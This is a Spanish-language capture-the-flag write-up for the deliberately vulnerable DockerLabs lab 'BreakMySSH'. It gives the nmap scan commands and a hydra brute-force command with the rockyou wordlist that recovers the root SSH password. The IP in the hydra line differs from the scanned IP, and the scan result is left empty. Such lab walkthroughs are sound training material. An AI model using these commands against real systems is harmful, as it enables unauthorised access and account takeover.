BreakMySSH

Introducción

En este artículo, detallaré el proceso de resolución del CTF de la máquina virtual BreakMySSH. Explico paso a paso las técnicas empleadas para identificar y explotar las vulnerabilidades disponibles.

Información de la Máquina Virtual

• Nombre: BreakMySSH
• Autor: El Pingüino de Mario
• Dificultad: Muy Fácil
• Fecha de creación: 29/05/2024

Paso 0: Instalación y Despliegue

• Descargamos la máquina desde DockerLabs.

• Descomprimimos el archivo .zip:

  unzip BreakMySSH.zip

• Ejecutamos el script de despliegue:

  sudo bash auto_deplo.sh BreakMySSH.tar

Paso 1: Reconocimiento

Escaneo de Red

La IP se proporciona automáticamente al desplegar la máquina, por lo que no es necesario realizar un escaneo ARP.

Creamos una estructura de trabajo ordenada:

mkdir BreakMySSH
cd BreakMySSH
mkt  # Crea carpetas: content, exploits, nmap y scripts

Escaneo de Puertos

Realizamos un escaneo completo de puertos con Nmap:

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts

Extraemos los puertos abiertos:

extractPorts allPorts

Realizamos un escaneo más específico de los servicios encontrados:

nmap -sCV -p22 172.17.0.2 -oN targeted

Resultado:

Paso 2: Explotación

El puerto SSH (22) es el único abierto. El nombre de la máquina sugiere que debemos enfocarnos en este servicio.

Realizamos un ataque de fuerza bruta con hydra, utilizando como usuario root:

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://172.18.0.2 -t 4

Hydra encuentra la contraseña válida para root, lo que nos permite acceder directamente mediante SSH.

Elevación de Privilegios

No es necesaria, ya que obtuvimos acceso como usuario root.

Conclusión

• La máquina cumple con su nivel de dificultad anunciado: muy fácil.
• Resultó ideal para practicar ataques de fuerza bruta y escaneo básico de puertos y servicios.